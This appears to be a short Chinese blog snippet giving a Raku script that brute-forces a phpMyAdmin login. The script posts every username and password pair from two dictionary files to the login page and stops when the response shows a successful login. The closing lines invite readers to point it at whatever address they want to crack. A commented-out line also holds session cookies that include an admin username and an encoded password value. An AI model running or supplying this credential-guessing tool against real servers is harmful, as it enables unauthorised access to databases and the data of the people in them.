use HTTP::UserAgent;
my $ua = HTTP::UserAgent.new;
my $url = 'http://localhost/phpMyAdmin/index.php';#phpmyadmin登录网址
my @password = lines 'password.txt'.IO;#密码文件为password.txt
my @username = lines 'username.txt'.IO;
#$ua.cookies.set-cookie('Set-Cookie:phpMyAdmin=4vd2oee7t866juc4mhdgh1f2krfjrg19; pma_lang=zh_CN; pma_mcrypt_iv=fQrWZU8NfOY%3D; pmaUser-1=%2FvfpAdZXYMk%3D; ui_session=2986ad8c0a5b3df4d7028d5f3c06e936c5963aaa3a167b3ee0278412688165d0ddb6c3ff6bbb1205814c276b222aaa72f04e2e57eb2ebefe0b0f8471d877ef955; deviceid=1499131713523; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=hh0bg0hd0wtt0hb0lb0bz0zn09');
for @username X @password -> ($username, $password) {
say 'Check: '~$username~' and '~$password;
my %data = :pma_username($username),:pma_password($password),:server,:token<c772cbc73b0aa39a08e6b772e87ab224>;
my $result = $ua.post($url, %data);
if ($result.content ~~ /'phpMyAdmin is more friendly with'/) {
say 'Login Ok!';
say '--> '~$username~':'~$password;
exit;
}
}
运行效果如下所示:
这个 X 操作符实在太方便了。
里面的phpmyadmin改成你要破解的地址
username.txt / password.txt 改成你要的字典就行。